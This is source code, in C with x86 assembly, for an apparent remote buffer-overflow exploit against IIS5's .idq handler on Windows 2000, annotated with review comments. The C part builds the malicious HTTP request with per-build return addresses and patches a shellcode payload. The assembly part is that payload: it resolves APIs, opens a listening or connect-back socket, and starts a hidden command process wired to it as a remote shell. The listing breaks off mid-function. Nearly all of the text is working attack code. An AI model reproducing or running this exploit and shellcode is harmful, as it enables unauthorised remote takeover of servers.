int Sk_Make_IIS5_IDQ_ShellCode(char *pszOutput, SYSTEM_TYPE SystemType, ConnectStruct *pConnectStruct, LPCTSTR lpszBindCmd)
{
char szBuf[2048];
char szOutput[10000], szCreateCode[10000];
char *p;
DWORD dwGetModuleHandle = 0, dwGetProcAddress=0, dwRetJmpEbx=0;
WORD wSelectValue = MAX_SYSTEM_TYPE_NUM;
// Identity mapping from SystemType to the table index. Its only effect is
// to leave wSelectValue at MAX_SYSTEM_TYPE_NUM for ENGLISH_SP2 and for any
// value outside the enum (negative ones included), which the check after
// the switch turns into a 0 return.
switch( SystemType){
case IIS5_WIN2K_CHINESE_SP0:
wSelectValue = IIS5_WIN2K_CHINESE_SP0;
break;
case IIS5_WIN2K_CHINESE_SP1:
wSelectValue = IIS5_WIN2K_CHINESE_SP1;
break;
case IIS5_WIN2K_CHINESE_SP2:
wSelectValue = IIS5_WIN2K_CHINESE_SP2;
break;
case IIS5_WIN2K_ENGLISH_SP0:
wSelectValue = IIS5_WIN2K_ENGLISH_SP0;
break;
case IIS5_WIN2K_ENGLISH_SP1:
wSelectValue = IIS5_WIN2K_ENGLISH_SP1;
break;
case IIS5_WIN2K_ENGLISH_SP2:
break; // deliberately unsupported: wSelectValue stays MAX_SYSTEM_TYPE_NUM
case IIS5_WIN2K_JAPANESE_SP0:
wSelectValue = IIS5_WIN2K_JAPANESE_SP0;
break;
case IIS5_WIN2K_JAPANESE_SP1:
wSelectValue = IIS5_WIN2K_JAPANESE_SP1;
break;
case IIS5_WIN2K_JAPANESE_SP2:
wSelectValue = IIS5_WIN2K_JAPANESE_SP2;
break;
case IIS_WIN2K_MEXICO_SP0:
wSelectValue = IIS_WIN2K_MEXICO_SP0;
break;
case IIS_WIN2K_MEXICO_SP1:
wSelectValue = IIS_WIN2K_MEXICO_SP1;
break;
case IIS_WIN2K_MEXICO_SP2:
wSelectValue = IIS_WIN2K_MEXICO_SP2;
break;
default:
break;
}
if( wSelectValue >= MAX_SYSTEM_TYPE_NUM) return 0;
dwGetModuleHandle = AllSystemFuncAddr[wSelectValue].dwGetModuleHandle;
dwGetProcAddress = AllSystemFuncAddr[wSelectValue].dwGetProcAddress;
dwRetJmpEbx = AllSystemFuncAddr[wSelectValue].dwRetJmpEbxAddr;
if( dwGetModuleHandle == 0) return 0; // the all-zero rows ("--" names in szSystemName)
// Query-string part: 0x01 filler (no NUL, CR, LF or '%') with the marker
// text at the front, copied without its terminator on purpose.
memset( szBuf, 1, sizeof(szBuf));
memcpy( szBuf, szSnakeSign, strlen(szSnakeSign));
// From IIS5_IDQ_EXCEPTION_OFFSET-2 on: forwardjump, 0x01, the two halves of
// dwRetJmpEbx as "%uXXXX" (low word first), 0x01, jump_to_shell. The last
// wsprintf NUL-terminates szBuf, which the "%s" below depends on.
p = &(szBuf[IIS5_IDQ_EXCEPTION_OFFSET-2]);
wsprintf( p,"%s", forwardjump);
p += strlen((char *)forwardjump);
*p++ = 1;
*p++ = '%';
*p++ = 'u';
wsprintf( p, "%04x", (dwRetJmpEbx>>0)&0xffff);
p += 4;
*p ++ = '%';
*p ++ = 'u';
wsprintf( p, "%04x", (dwRetJmpEbx>>16)&0xffff);
p += 4;
*p++ = 1;
wsprintf( p, "%s", jump_to_shell);
//wsprintf( szOutput,"GET /n.idq?%s=b HTTP/1.0\r\nShell: %s\r\n\r\n", szBuf, szMyCode);
wsprintf( szOutput,"GET /n.idq?%s=b HTTP/1.0\r\nSnake: ", szBuf);
// Working copy of the payload, terminator included; the global is never modified.
memcpy( szCreateCode, szSnakeBindShellCode, sizeof(szSnakeBindShellCode));
// Write the address and port information into the payload's stConnectInfo
// block (positions given by the dw*_Offset macros). Every 16-bit value goes
// through Convert_Ansi_Word_To_Sk_Long so that no NUL/CR/LF byte lands in
// the request. The (DWORD *) stores are unaligned and type-punned — fine
// on x86 with MSVC, not portable.
DWORD *pdw, dwTemp;
WORD wTemp;
char *lpsz, szExecTemp[wExecCommandSize];
//Init Value.
switch( pConnectStruct->byConnectType){
case LISTEN_ON_PORT:
szCreateCode[dwConnectType_Offset] = LISTEN_ON_PORT;
dwTemp = Convert_Ansi_Word_To_Sk_Long( pConnectStruct->wListenPort);
lpsz = &( szCreateCode[dwListenPort_Offset]);
pdw = (DWORD *)lpsz;
*pdw = dwTemp; //set listen port.
break;
case CONNECT_TO_HOST:
szCreateCode[dwConnectType_Offset] = CONNECT_TO_HOST;
// The low 16 bits of the IP go to dwConnectIP2_Offset and the high 16
// bits to dwConnectIP1_Offset (the original "set IP1"/"set IP2"
// comments were the other way round); the payload rebuilds the address
// as (IP1 << 16) | IP2.
wTemp = (WORD)( (pConnectStruct->dwConnectIP) & 0xffff);
dwTemp = Convert_Ansi_Word_To_Sk_Long( wTemp);
lpsz = &( szCreateCode[dwConnectIP2_Offset]);
pdw = (DWORD *)lpsz;
*pdw = dwTemp; //set the low half of the IP (dwConnectIP2_Offset).
wTemp = (WORD)( ((pConnectStruct->dwConnectIP) & 0xffff0000) >> 16);
dwTemp = Convert_Ansi_Word_To_Sk_Long( wTemp);
lpsz = &( szCreateCode[dwConnectIP1_Offset]);
pdw = (DWORD *)lpsz;
*pdw = dwTemp; //set the high half of the IP (dwConnectIP1_Offset).
dwTemp = Convert_Ansi_Word_To_Sk_Long( pConnectStruct->wConnectPort);
lpsz = &( szCreateCode[dwConnectPort_Offset]);
pdw = (DWORD *)lpsz;
*pdw = dwTemp; //set connect Port.
break;
default:
return 0;
}
// The two addresses are stored raw (not encoded). The rows present contain
// no 0x00/0x0a/0x0d byte; a row that did would cut the request short at
// the strcat below.
lpsz = &( szCreateCode[dwGetModuleHandle_Offset]);
pdw = (DWORD *)lpsz;
*pdw = dwGetModuleHandle; //set dwGetModuleHandle.
lpsz = &( szCreateCode[dwGetProcAddress_Offset]);
pdw = (DWORD *)lpsz;
*pdw = dwGetProcAddress; //set dwGetProcAddress.
// Command field: exactly wExecCommandSize bytes, '+'-padded and not
// NUL-terminated (a NUL would end the request). strlen() is narrowed to a
// WORD before the compare, so a command of 64 KB or more would be
// mis-measured; main() passes a 129-byte buffer at most.
memset( szExecTemp, '+', wExecCommandSize);
wTemp = strlen( lpszBindCmd);
if(wTemp >= wExecCommandSize)
wTemp = wExecCommandSize-1;
strncpy( szExecTemp, lpszBindCmd, wTemp);
lpsz = &( szCreateCode[dwExecCommand_Offset]);
memcpy( lpsz, szExecTemp, wExecCommandSize);
// strcat stops at the first NUL in szCreateCode, i.e. at the literal's
// explicit trailing "\x00"; everything patched above is encoded to keep
// the bytes before it NUL-free.
strcat( szOutput, szCreateCode);
strcat( szOutput, "\r\n\r\n");
strcpy( pszOutput, szOutput); // unbounded: the caller's buffer size is unknown here
return strlen( pszOutput);
}

// Local address-collection helper behind main()'s "GetAddr" mode: resolves
// GetModuleHandleA and GetProcAddress in this process's kernel32, lists the
// "jmp ebx" locations Search_Jump_Ebx_Code finds in user32, and formats it
// all as "Addr1: 0x..; Addr2: 0x..\r\nJJ: 0x.. 0x.. ..." into szInfo (at most
// iMaxSize bytes, always NUL-terminated). Presumably how the rows of
// AllSystemFuncAddr were gathered on each Windows 2000 build.
// NOTE(review): the GetModuleHandle/GetProcAddress results are not checked
// for NULL; iMaxSize must be >= 1 because szInfo[iMaxSize-1] is written
// unconditionally; and wsprintf caps its output at 1024 bytes, so a long
// jmp-ebx list would be silently cut — TODO confirm the cap for this SDK.
void GetNecesProcAddr( char *szInfo, int iMaxSize)
{
HANDLE hModule = GetModuleHandle("kernel32");
DWORD dwAddr_GetHandle, dwAddr_GetProcAddr;
char szOutput[11024], szJmpAddr[8124], szOne[20];
DWORD dwJmpEbx[100];
WORD wGetJmpCount,w;
wGetJmpCount = Search_Jump_Ebx_Code(dwJmpEbx, 100); // limit matches the size of dwJmpEbx
szJmpAddr[0] = 0;
for( w=0; w<wGetJmpCount; w++){
wsprintf( szOne," 0x%X", dwJmpEbx[w]); // " 0x" plus at most 8 hex digits fits szOne
strcat( szJmpAddr, szOne);
}
dwAddr_GetHandle = (DWORD)GetProcAddress( (HINSTANCE)hModule,"GetModuleHandleA");
dwAddr_GetProcAddr = (DWORD)GetProcAddress( (HINSTANCE)hModule, "GetProcAddress");
wsprintf( szOutput,"Addr1: 0x%X; Addr2: 0x%X\r\nJJ:%s",
dwAddr_GetHandle, dwAddr_GetProcAddr, szJmpAddr);
//MessageBox( NULL, szOutput, "topic", MB_OK);
// strncpy does not terminate on truncation; the explicit NUL below covers that.
strncpy( szInfo, szOutput, iMaxSize);
szInfo[iMaxSize-1] = 0;
}

#define JUMP_EBX_CODE 0xe3ff /* little-endian word for the byte pair FF E3 ("jmp ebx") */
// Scan 400000 bytes from the load address of user32 for the byte pair FF E3
// and record the address of each hit in dwArray (up to wMaxCount entries).
// Returns the number of hits stored. Feeds the third column of
// AllSystemFuncAddr through GetNecesProcAddr.
// NOTE(review): the "size is 39kb" comment and the constant disagree (400000
// is about 390 KB); the scan ignores the image's real size and does not check
// GetModuleHandle for NULL, so it can run past the mapping and fault. With
// wMaxCount == 0 one entry is still stored before the bound check fires.
// wTemp is unused and wCount is zeroed twice.
WORD Search_Jump_Ebx_Code(DWORD *dwArray, WORD wMaxCount)
{
HANDLE hDllModule = GetModuleHandle("user32");
char *pValue;
WORD wTemp = JUMP_EBX_CODE;
DWORD dwMin = (DWORD)hDllModule,dwMax;
WORD wCount = 0;
pValue = (char*)dwMin;
wCount = 0;
dwMax = dwMin + 400000; //size is 39kb. (sic — 400000 bytes is ~390 KB)
while( ( (DWORD)pValue) < dwMax){
if( *((WORD *)pValue) == JUMP_EBX_CODE){ // unaligned 16-bit read; x86 tolerates it
dwArray[wCount++] = (DWORD)pValue;
if( wCount >= wMaxCount) break;
}
pValue++;
}
return wCount;
}

文件3. SkShellCodeFunc.h -- 必须的头文件

//SkShellCodeFunc.h

////////////////////////////////////////////////////////////////////////////////

// header file for 定义shellcode 函数

////////////////////////////////////////////////////////////////////////////////

// start by snake. 2001/7/11

////////////////////////////////////////////////////////////////////////////////

#ifndef _SNAKE_SHELLCODE_FUNC_HEADER_2001_7_11

#define _SNAKE_SHELLCODE_FUNC_HEADER_2001_7_11

// Index into szSystemName / AllSystemFuncAddr (SkShellCodeFunc.cpp). The
// value comes straight from atoi(argv[1]) in main(). MAX_SYSTEM_TYPE_NUM is
// the row count, not a selectable type. (This header uses BYTE/WORD/DWORD/
// LPCTSTR without including windows.h itself; both .cpp files include the
// Windows headers first.)
enum SYSTEM_TYPE{
IIS5_WIN2K_CHINESE_SP0,
IIS5_WIN2K_CHINESE_SP1,
IIS5_WIN2K_CHINESE_SP2,
IIS5_WIN2K_ENGLISH_SP0,
IIS5_WIN2K_ENGLISH_SP1,
IIS5_WIN2K_ENGLISH_SP2,
IIS5_WIN2K_JAPANESE_SP0,
IIS5_WIN2K_JAPANESE_SP1,
IIS5_WIN2K_JAPANESE_SP2,
IIS_WIN2K_MEXICO_SP0,
IIS_WIN2K_MEXICO_SP1,
IIS_WIN2K_MEXICO_SP2,
MAX_SYSTEM_TYPE_NUM,
};
// Value carried in ConnectStruct::byConnectType (from atoi(argv[4]) in
// main()); only LISTEN_ON_PORT and CONNECT_TO_HOST are accepted by the builder.
enum Sk_ConnectType{ CONNECTTYPE_NONE=0, LISTEN_ON_PORT=1, CONNECT_TO_HOST, MAX_CONNECT_TYPE};
// Host-side description of the connection the payload should set up; the
// builder encodes it into the payload's stConnectInfo block (iis_idq.asm).
typedef struct _ConnectStruct{
BYTE byConnectType; // an Sk_ConnectType value
WORD wListenPort; // read when byConnectType == LISTEN_ON_PORT
DWORD dwConnectIP; // read when byConnectType == CONNECT_TO_HOST
WORD wConnectPort; // read when byConnectType == CONNECT_TO_HOST
}ConnectStruct;
// Display name for a SYSTEM_TYPE; out-of-range values give "Unknown..".
LPCTSTR GetSystemName( SYSTEM_TYPE type);

#endif //_SNAKE_SHELLCODE_FUNC_HEADER_2001_7_11

文件4.iis_idq.asm --shellcode的汇编代码(编译不需要)

;//IIS5_idq.asm

.386p

.model flat,c

;// Connection-info block that the host side patches into the payload. Its
;// layout matches the dw*_Offset macros in SkShellCodeFunc.cpp: byConnectType
;// at +0, dwListenPort at +4, dwIP1 at +8, dwIP2 at +12, dwConnectPort at
;// +16 (20 bytes in all).
stConnectInfo struct
byConnectType db 0 ;//=1, listen; =2, connect out to ip/port (Sk_ConnectType).
byReserv1 db 1 ;//nothing just for Word Adjusted.
dwReserv1 dw 1 ;//nothing just for Word Adjusted. (a word, despite the dw-prefixed name)
dwListenPort dd 0 ;//DDWORD dwIP1+dwIP2;
dwIP1 dd 0 ;// //IP and port: each byte is carried as two bytes, high byte = type, low byte = value.
dwIP2 dd 0 ;// 1. high byte = 1: the low byte is the plain value.
dwConnectPort dd 0 ;// 2. high byte = 2: the real value is the low byte minus 1 (the encoder stored value+1; see Convert_Ansi_Word_To_Sk_Long).
stConnectInfo ends

;// Table of resolved API addresses. _Get_Overflow_Addr_From_Shell_Func fills
;// it sequentially, in the order the names appear in the payload's name list
;// (the kernel32 group first, then the ws2_32 group), so this field order
;// must match that list exactly.
SkOverflowFuncAddr struct
;// kernel32
TerminateProcess dd 0;
CreatePipe dd 0;
GetStartupInfoA dd 0;
CreateProcessA dd 0;
PeekNamedPipe dd 0;
GlobalAlloc dd 0;
WriteFile dd 0;
ReadFile dd 0;
Sleep dd 0;
ExitProcess dd 0;
GetLastError dd 0;
DuplicateHandle dd 0;
GetCurrentProcess dd 0;
CloseHandle dd 0;
;// ws2_32
socket dd 0;
bind dd 0;
listen dd 0;
accept dd 0;
send dd 0;
recv dd 0;
setsockopt dd 0;
WSAStartup dd 0;
closesocket dd 0;
connect dd 0;
gethostname dd 0;
SkOverflowFuncAddr ends

;// Local mirror of the Win32 STARTUPINFO layout (68 bytes); `size STARTUPINFO`
;// is used by _Create_Process_To_Handle to zero it and to fill in cb.
STARTUPINFO struct
cb dd 0;
lpReserved dd 0;
lpDesktop dd 0;
lpTitle dd 0;
dwX dd 0;
dwY dd 0;
dwXSize dd 0;
dwYSize dd 0;
dwXCountChars dd 0;
dwYCountChars dd 0;
dwFillAttribute dd 0;
dwFlags dd 0;
wShowWindow dw 0;
cbReserved2 dw 0;
lpReserved2 dd 0;
hStdInput dd 0;
hStdOutput dd 0;
hStdError dd 0;
STARTUPINFO ends

;// Local mirror of the Win32 PROCESS_INFORMATION layout (16 bytes), filled by
;// CreateProcessA in _Create_Process_To_Handle.
PROCESS_INFORMATION struct
hProcess dd 0;
hThread dd 0;
dwProcessId dd 0;
dwThreadId dd 0;
PROCESS_INFORMATION ends;

;// Socket / command-interaction state: the two pipe pairs, the connected
;// socket, and the child's PROCESS_INFORMATION and STARTUPINFO.
;// _Create_Process_To_Handle wires ShellStdinPipe and ShellStdoutPipe into
;// nstartupinfo's standard handles.
Shell_Cmd_Pipe struct
hReadPipe dd 0;
ShellStdoutPipe dd 0;
hWritePipe dd 0;
ShellStdinPipe dd 0;
msocket dd 0;
ProcessInformation PROCESS_INFORMATION <>;
nstartupinfo STARTUPINFO <>;
Shell_Cmd_Pipe ends

SIZE_OF_TEMP_BUFFER equ 0f0h ;// 240-byte scratch buffer
;// Receive / write-to-pipe working data: a scratch buffer plus two flags.
;// Not referenced in the part of the listing shown here.
Recv_Write_Socket_Pipe_Data struct
szTemp db SIZE_OF_TEMP_BUFFER dup(0)
dwBreak DD 0
dwTemp DD 0
Recv_Write_Socket_Pipe_Data ends;

;// Local mirror of the Winsock sockaddr_in layout (16 bytes). bind/accept use
;// `size sockaddr_in`; the connect path pushes the literal 10h instead.
SOCKADDR_IN struct
sin_family dw 0;
sin_port dw 0;
sin_addr dd 0;
sin_zero db 8 dup(0);
SOCKADDR_IN ends

;// Local mirror of the Win32 SECURITY_ATTRIBUTES layout (12 bytes). Not
;// referenced in the part of the listing shown here.
SECURITY_ATTRIBUTES struct
nLength DD 0;
lpSecurityDescriptor DD 0;
bInheritHandle DD 0;
SECURITY_ATTRIBUTES ends;

;// Stack-argument accessors for the internal routines: after push ebp /
;// mov ebp,esp the return address sits at [ebp+4] and the first argument at
;// [ebp+8].
FUNC_PARAM_1 equ [ebp+8]
FUNC_PARAM_2 equ [ebp+0ch]
FUNC_PARAM_3 equ [ebp+10h]
FUNC_PARAM_4 equ [ebp+14h]
FUNC_PARAM_5 equ [ebp+18h]
FUNC_PARAM_6 equ [ebp+1ch]
FUNC_PARAM_7 equ [ebp+20h]
SO_RCVTIMEO equ 1006h ;// receive timeout (Winsock option id)
SOL_SOCKET equ 0ffffh ;// options for socket level
;// Frame offsets for the main body's locals. None of the three is referenced
;// in the part of the listing shown here; presumably used past the cut.
Shell_Cmd_Pipe_OFFSET equ 3f0h
SkOverflowFuncAddr_OFFSET equ 2d0h
szShellNeedFunc_OFFSET equ 1d0h

.code

public _sk_Bind_ConnectShellCode

public _GetDataSetOffset_Value

start:

_sk_Bind_ConnectShellCode proc

push ebp;

mov ebp, esp;

;//产生 0x800的堆栈 空间.

xor eax,eax;

inc eax;

shl eax, 0bh; //=>0x800

sub esp, eax;

jmp call_back;

nop;

jump_next:

jmp run_actual1;

call_back:

call jump_next;

call_back_Data_Offset:

;//jmp quit_return; //not run here as no necessary.

;//(void *ptr, int iLen, DWORD dwOld, DWORD dwNew)
;// Replace every byte equal to AL (low byte of dwOld) with DL (low byte of
;// dwNew) within the iLen bytes at ptr. As the name says, it turns the '+'
;// fillers the host side had to use (it cannot emit NUL bytes into the
;// request) back into NUL terminators — presumably applied to the name list
;// before the API resolution. All registers it touches are preserved.
;// NOTE(review): repnz scasb also counts ECX down on a hit and the jcxz that
;// follows is tested before the store, so a match in the very last byte is
;// left unreplaced. jcxz here is the 16-bit CX form (bytes 67 E3 in
;// szSnakeBindShellCode), which is only correct for lengths below 64 KB.
_Convert_Add_Sign_To_Null_Sign:
push ebp;
mov ebp, esp;
push edi;
push ecx;
push eax;
push edx;
mov edi, FUNC_PARAM_1; ;// buffer
mov ecx, FUNC_PARAM_2; ;// length
mov eax, FUNC_PARAM_3; ;// byte to find (AL)
mov edx, FUNC_PARAM_4; ;// replacement byte (DL)
;// Search and replace repeatedly until ECX reaches 0.
NextAddSign:
repnz scasb;
jcxz Finish_Replace_Add_Sign;
dec edi; ;// step back onto the matching byte...
mov byte ptr [edi], dl; ;// ...overwrite it...
inc ecx; ;// ...and give the count back, since that byte is rescanned (it no longer matches).
jmp NextAddSign;
Finish_Replace_Add_Sign:
pop edx;
pop eax;
pop ecx;
pop edi;
pop ebp;
ret;

;// Convert the encoded long in EAX back into the plain word in AX.
;// Rule per 16-bit unit: 1. high byte = 1: the low byte is the plain value.
;//                      2. high byte = 2: the value is the low byte minus 1.
;// This is the inverse of Convert_Ansi_Word_To_Sk_Long in SkShellCodeFunc.cpp.
;// The high unit of EAX is decoded first and shifted into AH, then the low
;// unit into AL. Only AX is meaningful on return: the upper half of EAX still
;// holds shifted-in bits of the input (both callers use CX/AX only).
;// EBX, ECX and EDX are preserved.
_convert_Sk_Long_To_Ansi_Word:
push ebx;
push ecx;
push edx;
xor edx, edx; ;// pass counter: 0 = high unit, 1 = low unit
push eax; ;// EBX = high unit (EAX >> 16)
pop ebx;
shr ebx, 10h;
push eax; ;// ECX = whole input; its low unit is decoded on the second pass
pop ecx;
_Convert_bx_To_al_Short:
;// Decode the unit in BX: BH = type, BL = stored byte.
cmp bh, 1;
je _convert_Sk_Long_IsNormal;
dec bl; ;// type 2: undo the +1 the encoder applied
_convert_Sk_Long_IsNormal:
mov al, bl;
test edx, edx;
jnz Finish_Convert_Next_Bit;
shl eax, 8; ;// first pass done: move the decoded high byte into AH
push ecx; ;// BX = low unit
pop ebx;
inc edx;
jmp _Convert_bx_To_al_Short
Finish_Convert_Next_Bit:
pop edx;
pop ecx;
pop ebx;
ret;

run_actual1:

jmp run_actual2;

;// Fill SkOverflowFuncAddr from the szShellNeedFunc name list: walk the
;// packed list (count of DLLs; per DLL: length byte, name, count of
;// functions; per function: length byte, name — the names are visible as
;// plain text at the end of szSnakeBindShellCode) and store each resolved
;// address into the table in list order.
;//void _Get_Overflow_Addr_From_Shell_Func( void *SkOverflowFuncAddr,
;// char *ShellNeedFuncStr,
;// DWORD dwGetModuleHandleAddr,
;// DWORD dwGetProcAddr)
;
;// NOTE(review): SHELL_NEED_FUNC_BODY_OFFSET, used below, is not defined
;// anywhere in this listing. The length bytes include the '+' filler after
;// each name, so the names must already be NUL-terminated (see
;// _Convert_Add_Sign_To_Null_Sign) for GetModuleHandleA/GetProcAddress to
;// see the right string — presumably done by the caller. Neither result is
;// checked for NULL.
_Get_Overflow_Addr_From_Shell_Func:
push ebp;
mov ebp, esp;
push esi;
push edi;
push edx;
push ecx;
push ebx;
push eax;
mov edi, FUNC_PARAM_1; ;// EDI = SkOverflowFuncAddr (output table)
mov esi, FUNC_PARAM_2; ;// ESI = name list
xor ebx,ebx;
xor ecx,ecx;
mov cl,SHELL_NEED_FUNC_BODY_OFFSET;
add esi, ecx; //esi = szShellCodeNeedFunc+SHELL_NEED_FUNC_BODY_OFFSET
mov cl, byte ptr [esi]; ;// number of DLLs
inc esi;
_NextDllNameToLoad:
push ecx;
mov bl, byte ptr [esi]; ;// BL = length of this DLL name entry
inc esi; //skip size.
push esi;
mov eax, FUNC_PARAM_3; ;// GetModuleHandleA(name) -> EAX
;//mov eax, GetModuleHandleA_Addr; //GetModuleHandleA
call eax;
add esi, ebx; //go to next address.
;// ESI now points at the function count for this DLL.
xor ecx, ecx;
mov cl, byte ptr [esi];
inc esi;
;// Resolve each function.
_NextFunction_Addr:
push ecx;
;// BL = length of this function name entry
mov bl, byte ptr [esi];
inc esi;
push eax;
push esi;
push esi; //procName
push eax; //module
mov ecx, FUNC_PARAM_4; ;// 4th parameter: GetProcAddress (the original comment said 3rd)
;//mov eax, GetModuleHandleA_Addr; //GetModuleHandleA
call ecx;
mov dword ptr [edi], eax; ;// store the resolved address
add edi, 4;
pop esi;
pop eax;
add esi, ebx; ;// advance to the next name
pop ecx;
loop _NextFunction_Addr;
pop ecx;
loop _NextDllNameToLoad;
pop eax;
pop ebx;
pop ecx;
pop edx;
pop edi;
pop esi;
pop ebp;
ret;

run_actual2:

jmp run_actual3_1;

;//创建 一个管套,监听一个端口,返回该管套.

;//SOCKET _Create_Bind_Connect_Socket_To_Port( SkOverflowFuncAddr *pFuncAddr, szShellNeedFunc *pNeedFunc);

_Create_Bind_Connect_Socket_To_Port:

push ebp;

mov ebp, esp;

xor eax, eax; //开辟0xff(256)个byte的变量区域.

mov ax, 3f0h

sub esp, eax;

push esi;

push edi;

push edx;

push ecx;

push ebx;

mov esi, FUNC_PARAM_1; //第一个参数.

;//WSAStartup(werd,&wsd);

lea edi, [ebp-340h]; //开辟个空间做临时变量.

xor eax, eax;

mov al,2;

push edi;

push eax;

mov eax, [esi+SkOverflowFuncAddr.WSAStartup];

call eax;

;//msocket = socket( AF_INET, SOCK_STREAM, 0); = (2,1,0)

xor eax, eax;

push eax;

inc eax;

push eax;

inc eax;

push eax;

mov eax, [esi+SkOverflowFuncAddr.socket];

call eax;

;//取连结类型

mov edx, FUNC_PARAM_2;

lea ebx, [edx+stConnectInfo.byConnectType];

mov cl, BYTE PTR [ebx];

push eax;

;//准备参数 SOCKADDR_IN

lea edi, [ebp-0f0h]; //现在是sockaddr_in的地址.

lea ebx, [edi + SOCKADDR_IN.sin_family];

xor eax, eax;

mov al,2;

mov word ptr [ebx], ax; //SOCKADDR_IN.sin_family = AF_INET

pop eax;

;//现在寄存器状况..

;//edi --- 临时变量 sockaddr_in, (sin_family = AF_INET 被赋值)

;//edx --- 参数2 stConnectInfo 连结信息

;//eax --- 创建的管套 newsocket.

;//esi --- 参数1 SkOverflowFuncAddr 函数地址.

cmp cl,1 ;//是监听吗?

jne _IsConnectToIP; //no. 跳转.

push eax; // <-2@

;//取得端口value.

push eax; // <-1@

mov eax, [edx+stConnectInfo.dwListenPort];

call _convert_Sk_Long_To_Ansi_Word;

mov ecx, eax;

xchg ch,cl; //port = htons(port)

pop eax; // ->1@

lea ebx, [edi + SOCKADDR_IN.sin_port];

mov edx, FUNC_PARAM_2; //第2个参数.

mov word ptr [ebx], cx; //SOCKADDR_IN.sin_port = port.

xor eax, eax;

lea ebx, [edi + SOCKADDR_IN.sin_addr];

mov dword ptr [ebx], eax; //SOCKADDR_IN.sin_addr.S_un.S_addr = INADDR_ANY

pop eax; // ->2@

push eax; //<-3@

;//bind( msocket, (SOCKADDR *)&addrin, sizeof(addrin));

xor ecx, ecx;

mov cl, size sockaddr_in;

push ecx;

push edi;

push eax;

mov eax, [esi+SkOverflowFuncAddr.bind];

call eax;

;//下面的跳转,用来消去 距离太远造成的0. 对源程序没有影响的代码.

jmp _temp_1;

run_actual3_1:

jmp run_actual3_2;

_temp_1:

pop eax; //->3@

push eax; //<-4@

;//listen( msocket, 1);

xor ecx, ecx;

inc ecx;

push ecx;

push eax;

mov eax, [esi+SkOverflowFuncAddr.listen];

call eax;

pop eax; //->4@

push eax; //<-5@

;//newsocket = accept( msocket, (SOCKADDR*)&addrin, &iLen);

xor ecx, ecx;

mov cl, size sockaddr_in;

lea edi, [ebp-0c0h];

mov [edi], ecx;

push edi; //iLen = sizeof(addrin);

lea edi, [ebp-0f0h];

push edi; //&SOCKADDR_IN 结构.

push eax;

mov eax,[esi+SkOverflowFuncAddr.accept];

call eax;

pop edx; //->5@ //用来listen的socket.由eax->edx

push eax; //<-6@ //得到新的连结管套..

;//关闭 用来 listen的socket.

;//closesocket( msocket);

push edx;

mov eax, [esi+SkOverflowFuncAddr.closesocket];

call eax;

pop eax; //->6@

cmp eax, -1;

je WSocket_QuitRightNow;

jmp Finish_Get_Connection_Socket;

_IsConnectToIP: ;//连接到一个ip:port

;//addrin.sin_family = AF_INET;

;//addrin.sin_addr.S_un.S_addr = 0x0100007f;

;//addrin.sin_port = 0x8b; //139.

;//connect( socket, (SOCKADDR*)&addrin, sizeof(addrin));

;//准备参数 SOCKADDR_IN

;//现在寄存器状况..

;//edi --- 临时变量 sockaddr_in, (sin_family = AF_INET 被赋值)

;//edx --- 参数2 stConnectInfo 连结信息

;//eax --- 创建的管套 newsocket.

;//esi --- 参数1 SkOverflowFuncAddr 函数地址.

;//取得端口value.

push eax; //<-1@

mov eax, [edx+stConnectInfo.dwConnectPort];

call _convert_Sk_Long_To_Ansi_Word;

mov ecx, eax;

xchg ch,cl; //port = htons(port)

lea ebx, [edi + SOCKADDR_IN.sin_port];

mov word ptr [ebx], cx; //SOCKADDR_IN.sin_port = port.

;//下面的跳转,用来消去 距离太远造成的0. 对源程序没有影响的代码.

jmp _temp_1_1;

run_actual3_2:

jmp run_actual3;

_temp_1_1:

mov eax, [edx+stConnectInfo.dwIP1];

call _convert_Sk_Long_To_Ansi_Word;

mov ecx, eax;

shl ecx, 10h;

mov eax, [edx+stConnectInfo.dwIP2];

call _convert_Sk_Long_To_Ansi_Word;

mov cx, ax;

lea ebx, [edi + SOCKADDR_IN.sin_addr];

mov dword ptr [ebx], ecx; //SOCKADDR_IN.sin_addr.S_un.S_addr = stConnectInfo.dwIP1 + dwIP2

pop eax; //->1@

push eax; //<-2@

;//connect(msocket, addr, 0x10);

xor ecx, ecx;

mov cl, 10h;

push ecx; //sizeof(SOCKADDR_IN);

push edi; //SOCKADDR *

push eax; //msocket.

mov eax, [esi+SkOverflowFuncAddr.connect];

call eax; //connect.

mov ecx, eax;

pop eax; //->2@

jcxz Finish_Get_Connection_Socket; //connect success.

nop;

;//now, connect failure.

;//closesocket(eax)

push eax;

mov eax, [esi+SkOverflowFuncAddr.closesocket];

call eax;

xor eax, eax;

jmp WSocket_QuitRightNow;

Finish_Get_Connection_Socket:

push eax;

push eax;

pop edx; //edx = eax

;// setsockopt( newsocket, SOL_SOCKET, SO_RCVTIMEO, (LPCTSTR)&iLen, sizeof(iLen));

lea edi, [ebp-0f0h];

xor eax, eax;

mov al, 1;

mov [edi], eax;

shl eax, 2; //eax = 4

push eax;

push edi;

mov ax, SO_RCVTIMEO;

push eax;

mov ax, SOL_SOCKET;

push eax;

push edx;

mov eax, [esi+SkOverflowFuncAddr.setsockopt];

call eax;

pop eax;

WSocket_QuitRightNow:

;//返回结果.

pop ebx;

pop ecx;

pop edx;

pop edi;

pop esi;

mov esp, ebp;

pop ebp;

ret;

run_actual3:

jmp run_actual4_1;

;//在管套 pipe 上,运行进程 pStrCmd;

;//_Create_Process_To_Handle( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe, LPCTSTR *pStrCmd);

_Create_Process_To_Handle:

push ebp;

mov ebp, esp;

push edi;

push esi;

push edx;

push ecx;

push ebx;

push eax;

mov edi, FUNC_PARAM_2; //Shell_Cmd_Pipe *pCmdPipeData;

push edi;

pop edx; //edx = edi;

;//memset( &si, 0, sizeof(STARTUPINFO));

xor eax, eax;

lea edi, [edi +Shell_Cmd_Pipe.nstartupinfo];

push edi; //edi = &STARTUPINFO; ---

xor ecx, ecx;

mov cl, size STARTUPINFO;

rep stosb;

pop edi; // ---

;//si.cb = sizeof(STARTUPINFO);

lea esi, [edi + STARTUPINFO.cb];

mov cl, size STARTUPINFO;

mov [esi], ecx;

;//si.wShowWindow = SW_HIDE = 0; //need to do nothing.

;//si.dwFlags = STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW;

lea esi, [edi + STARTUPINFO.dwFlags];

mov cx, 101h;

mov [esi], ecx;

;//si.hStdInput = ShellStdinPipe;

push edi;

lea edi, [edi + STARTUPINFO.hStdInput];

lea esi, [edx + Shell_Cmd_Pipe.ShellStdinPipe];

mov eax, [esi];

mov [edi], eax;

pop edi;

;//si.hStdOutput = ShellStdoutPipe;

